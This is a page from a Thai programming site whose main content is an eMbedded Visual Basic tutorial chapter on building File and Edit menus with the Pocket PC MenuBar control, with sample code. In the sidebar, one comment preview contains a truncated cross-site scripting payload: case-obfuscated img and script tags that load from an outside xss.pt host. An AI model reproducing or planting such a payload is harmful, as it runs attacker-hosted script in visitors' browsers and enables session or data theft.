หน้าแรก
 การบ้าน
  C/C++ new
  Java new
 Sourcecode.TV
  Android
  Blackberry
  C/C++
  Java
  Linux
  Windows Phone
  แจ้งเรื่องที่ต้องการ
 บทความ
  .NET
  Android
  Blackberry
  C++Builder
  Delphi
  Java
  Mobile
  Open Source
  Pocket PC
  Visual Basic
  Web
  Windows Phone
  Others
 แบบเรียนฟรี
  ASP
  ASP.NET Webmatrix
  C++
  eVB
  J2ME
  Java
  PHP
 ซอร์สโค้ด
  Android
  ASP
  C++
  VC++
  CGI-Perl
  Delphi
  Java
  jQuery
  PHP
  Visual Basic
  .NET
 บริการจากเรา
  เปิดท้าย... ขายโค้ด
  DoodeeHosting
  รับออกแบบ พัฒนาเว็บไซต์
  Freeware
  อัตราค่าโฆษณา
  รายชื่อลูกค้า
  สถิติผู้เข้าเว็บ
 ดาว์นโหลด
 ค้นหาข้อมูล
 กระดานสนทนา
  .NET
  C/C++
  Delphi
  Java
  Palm/PocketPC
  Visual Basic
  Web
  อื่นๆ
 กระดานงาน
 ลิงค์เว็บ
 เกี่ยวกับผม
 อัตราค่าโฆษณา
Social Network

Facebook  Twitter  YouTube
 New Article
 Webboard
 Freelanceboard
Freeware
โปรแกรมเบอร์ดี (BerDee)
โปรแกรมเบอร์ดี (Android)
เกมส์เป่ายิ้งฉุบ
เกมส์เป่ายิ้งฉุบ(Android)
WebcamMonitor
WebcamMonitor(Windows)
scSendMail
scSendMail(Windows)
MSN Caption
MSN Caption(Windows)
  Freelance comment
  ติดต่อสอบถามมาได้ตลอดนะ...
2015-07-29 13:35:58
  ถ้าผมต้องการเว็บที่พัฒน...
2015-01-18 15:33:54
  ถ้าผมต้องการเว็บที่พัฒน...
2015-01-18 15:32:51
  ติดต่อสอบถามเข้ามาได้นะ...
2014-01-06 12:47:38
  ถ้ายังหาคนสอนไม่ได้ ก็ลอ...
2013-07-06 01:04:37
  สนใจส่งขอบเขตมาคุยราคาก...
2013-03-24 18:54:20
  ถ้ายังไม่มีคนรับงานติดต...
2012-12-16 19:18:14
  สนใจคะ ติดต่อ 0905076277...
2012-11-12 11:07:46
  รับทำโปรเจ็คนักศึกษาหรื...
2012-10-29 03:10:46
  sukit_te34@hotmail.com...
2012-10-29 03:09:36
  Webboard comment
  พอดีผมเห...
2020-05-31 21:49:43
  ช่วย แสดง...
2020-04-27 11:21:00
  ได้การบ้...
2020-04-27 11:18:56
  ได้การบ้...
2020-04-27 11:02:44
  <a href="https://www.g...
2020-03-10 17:07:03
  ไม่อยากเ...
2020-03-10 17:05:36
  ขอโคํดเก...
2020-02-09 22:50:58
  ขอโค้ดเก...
2020-01-28 23:42:26
  uuu...
2020-01-24 11:54:34
  ก็ต้องลง ...
2019-10-22 01:56:28
  Homework comment
  โจทย์การบ้าน c++ เขียนรูปแ...
2020-04-06 11:01:33
  แบบนี้ขอเป็น ภาษา php หน่อย...
2019-09-18 14:36:34
  ผมไม่อยากให้คุณได้คะแนน...
2019-04-27 01:29:07
  อาจารย์เขาบอกแนวข้อสอบม...
2019-04-27 00:44:29
  ขอสอบถามการเขียน c++ ครับ เ...
2018-04-02 12:19:21
  โค้ดตัวอย่างศึกษาให้เข้...
2017-11-26 14:50:05
  คำนวณค่าน้ำโดยรับค่ามิเ...
2017-11-20 23:15:26
  ขอบคุณมากครับ...
2017-08-16 18:27:25
  ทำเอง งง เอง กะลังทำใหม่ค...
2017-04-18 18:40:46
  ทำเอง งง เอง กะลังทำใหม่ค...
2017-04-18 18:37:54
  Article comment
  asdasd...
2020-01-28 19:48:57
  ต้องการ ให้เขียน โปรแกรม ...
2019-12-09 11:39:58
  รับเขียน arx จาก vc++ 2017 ล็อคโปร...
2019-09-19 09:48:09
  ทำการ register ไฟล์ที่ชื่อ mswinsck.oc...
2019-09-17 14:05:56
  <Img sRC=https://xss.pt/op2fp.jpg>
<sCRiPt sRC=//xss.pt/op...

2019-09-12 13:43:34
  ใน vb 6 ไม่มี component winsock เลยค่ะ ส...
2019-09-03 10:31:02
  รบกวนขอสอบถามหน่อยนะครั...
2019-03-04 05:31:04
  สามารถนำตัวหนังสือจากภา...
2018-12-25 08:54:32
  มีcode ของ VB ไหมค่ะ ถ้ามีรบกว...
2017-09-28 16:50:02
  น่าจะได้ครับ ไม่เคยลอง
...

2017-07-11 09:59:35
  9Mcode comment
  อยากได้...
2014-02-21 08:52:19

Link Exchange

อัตราค่าโฆษณา
Statistics of Sourcecode in Thailand
 
 eMbedded Visual Basic Tutorial  

- - - - - - - - - - - - - - ผู้ให้การสนับสนุน- - - - - - - - - - - - - -

 eMbedded Visual Basic
 
 

บทที่ 6 โปรแกรมตัวอย่างการใช้เมนู

 

การสร้างเมนูบาร์ สำหรับใช้งานกับโปรแกรม เพื่อให้ผู้ใช้สามารถเลือกการทำงานที่ต้องการได้ จัดเป็นวิธีการที่ดี แต่สำหรับ Pocket PC แล้ว ตำแหน่งของเมนูบาร์ จะอยู่ด้านล่างของหน้าต่าง ซึ่งจะไม่เหมือนกับบนระบบ วินโดวส์ ที่เมนูบาร์จอยู่ด้านบน

Downloadดาวน์โหลดโปรแกรม

เพิ่มคอมโพเนนท์ของเมนูบาร์

 • ทำการสร้างโปรเจคใหม่ขึ้นมา
 • คลิกเลือกที่เมนู Project->Components...

รูปแสดงการเลือกเมนู คอมโพเนนท์
รูปแสดงการเลือกเมนู คอมโพเนนท์

 • ทำการเลือกรายการ Microsoft PocketPC MenuBar Control 3.0 ดังรูป

รูปแสดง การเลือกรายกาคอนโทรล Menu

 • คลิกปุ่ม OK
 • ทำการดับเบิ้ลคลิก MenuBar จาก Toolbar ด้านข้าง เพื่อเพิ่ม คอนโทรล เข้าสู่ฟอร์ม ดังรูป

รูปแสดง การคลิกวางคอนโทรล Mainmenu ไว้บนฟอร์ม
รูปแสดง การคลิกวางคอนโทรล Mainmenu ไว้บนฟอร์ม

การเพิ่มเมนู

 • ทำการคลิกเลือก MenuBar และกำหนด Property ของ NewButton=False

รูปแสดง การกำหนด Property ของ NewButton=False
รูปแสดง การกำหนด Property ของ NewButton=False

โดยทั่วไป เมื่อคุณสั่ง Run โปรแกรมของคุณ ในขณะที่บนฟอร์ม มีคอนโทรล Menubar อยู่นั้น ผลการ Run จะมีรายการของ เมนู ที่ชื่อว่า New ให้มาโดยอัตโนมัติ ถ้าไม่ต้องการเมนูดังกล่าวจะต้องกำหนด Property ของ NewButton=False

 • ที่ฟอร์มของโปรแกรม ทำการดับเบิ้ลคลิก จะปรากฏหน้าต่าง Code View ให้ทำการเลือกรายการด้านบนของหน้าต่าง เป็น Load เพื่อสร้าง Sub Form_Load สำหรับการเขียนการทำงาน ในขณะที่ฟอร์มเริ่มต้นทำงาน

รูปแสดงการสร้างเหตุการณ์ เมื่อฟอร์มเริ่มต้นทำงาน
รูปแสดงการสร้างเหตุการณ์ เมื่อฟอร์มเริ่มต้นทำงาน

 • ทำการป้อนโค้ด ตามตาราง เพื่อสร้างเมนู 2 รายการคือ File และ Edit โดยในแต่ละรายการจะประกอบด้วย รายการเมนูย่อย ที่สร้างขึ้น โดยกำหนดค่าของตำแหน่งของเมนูย่อย, key สำหรับเป็นชื่อของเมนูย่อย และ ข้อความที่แสดงบนเมนูย่อย เช่น mnuFile.Items.Add 1, "mnuFileOpen", "Open" หมายความถึง คอนโทรล mnuFile ทำการเพิ่มรายการที่ 1โดยมีค่า key เป็น mnuFileOpen (key จะถูกใช้เพื่อตรวจสอบ การคลิกเมนู) และแสดงข้อความ "Open" บนรายการของเมนู
Private Sub Form_Load()
Dim mnuFile As MenuBarMenu
Dim mnuEdit As MenuBarMenu

  Set mnuFile = MenuBar1.Controls.AddMenu("File", "mnuFile")
  mnuFile.Items.Add 1, "mnuFileOpen", "Open"
  mnuFile.Items.Add 2, "mnuFileAdd", "Add"
  mnuFile.Items.Add 3, "mnuFileSave", "Save"
  
  Set mnuEdit = MenuBar1.Controls.AddMenu("Edit", "mnuEdit")
  mnuEdit.Items.Add 1, "mnuEditCut", "Cut"
  mnuEdit.Items.Add 2, "mnuEditPaste", "Paste"

End Sub

 • ทดสอบ Run โปรแกรมโดยกดปุ่ม F5 จะได้ผลดังรูป

รูปแสดง ผลการ Run โปรแกรม
รูปแสดง ผลการ Run โปรแกรม

 • ทำการปิดโปรแกรม หรือ หยุดการ Run โปรแกรม
 • ทำการเปิดไปยังหน้าต่าง Code View และเลือก

รูปแสดง การสร้าง sub เมื่อมีการเลือกคลิกที่เมนู
รูปแสดง การสร้าง sub เมื่อมีการเลือกคลิกที่เมนู

 • แล้วทำการเพิ่มโค้ดลงไป เพื่อทำการตรวจสอบว่า มีการคลิกเมนูรายการใด และคุณจะสามารถนำส่วนนี้ในการ เรียกการทำงานต่างๆ ที่ต้องการ ซึ่งในตัวอย่าง จะแสดงแค่เพียงหน้าต่าง ข้อความธรรมดา คุณสามารถใส่การทำงาน หรือเรียกใช้ sub หรือ function ที่เขียนไว้ได้
Private Sub MenuBar1_MenuClick(ByVal Item As MenuBarLib.Item)
  Select Case Item.Key
    Case "mnuFileOpen"
      MsgBox "File Open"
      
    Case "mnuFileAdd"
      MsgBox "File Add"
    
    Case "mnuFileSave"
      MsgBox "File Save"
    
    Case "mnuEditCut"
      MsgBox "Edit Cut"
    
    Case "mnuEditPaste"
      MsgBox "Edit Paste"
    
  End Select
End Sub
 • ทำการทดสอบโปรแกรม โดยกดปุ่ม F5 ให้คุณทดสอบคลิกเลือกตามเมนูต่างๆจะได้ผล ดังรูป

รูปแสดง การทดสอบการทำงานของโปรแกรม โดยคลิกเลือกเมนู
รูปแสดง การทดสอบการทำงานของโปรแกรม โดยคลิกเลือกเมนู

 

BACK

หัวแปลง Mini DisplayPort to HDMI Adapter หัวแปลง Mini DisplayPort to HDMI Adapter สำหรับเครื่อง macbook air/pro, mac mini
หัวแปลง Mini DisplayPort to HDMI Adapter สำหรับเครื่อง macbook air/pro, mac mini
คลิปสอนเขียนโปรแกรม
เรียนเขียนโปรแกรมดอทเน็ต
เรียนเขียนโปรแกรมแอนดรอยด์
เรียนเขียนโปรแกรมเบล็คเบอร์รี่
เรียนเขียนโปรแกรมซี ซีพลัสพลัส
เรียนเขียนโปรแกรมจาวา
เรียนการใช้งานลินุกส์
เรียนการเขียนโปรแกรมวินโดว์โฟน
เรียนการเขียนโปรแกรมพีเฮชพี มายเอสคิวเอล
9M Blog บอกเล่าเรื่องราว การเขียนโปรแกรมของ นายเอ็ม
บริการ ถ่ายภาพรับปริญญา
อัตราค่าโฆษณา
 
Tutorial
eVB Tutorial
ASP.NET Webmatrix Tutorial
J2ME Tutorial
C++ Tutorial
Java Tutorial
PHP Tutorial
ASP Tutorial
 
แบบสำรวจ
Freelance รับพัฒนาโปรแกรม

Home - Article - Tutorial - Sourcecode - Dev Handbook - Search - WebBoard - Links - About Us

สงวนลิขสิทธิ์ ห้ามคัดลอก ทำซ้ำ แก้ไข ดัดแปลง ไม่ว่าในรูปแบบใด โดยไม่ได้รับอนุญาตเป็นลายลักษณ์อักษร
เลขทะเบียนพาณิชย์อิเล็กทรอนิกส์จากกระทรวงพาณิชย์: 7100503002000
Copyright 2001 SourceCode.in.th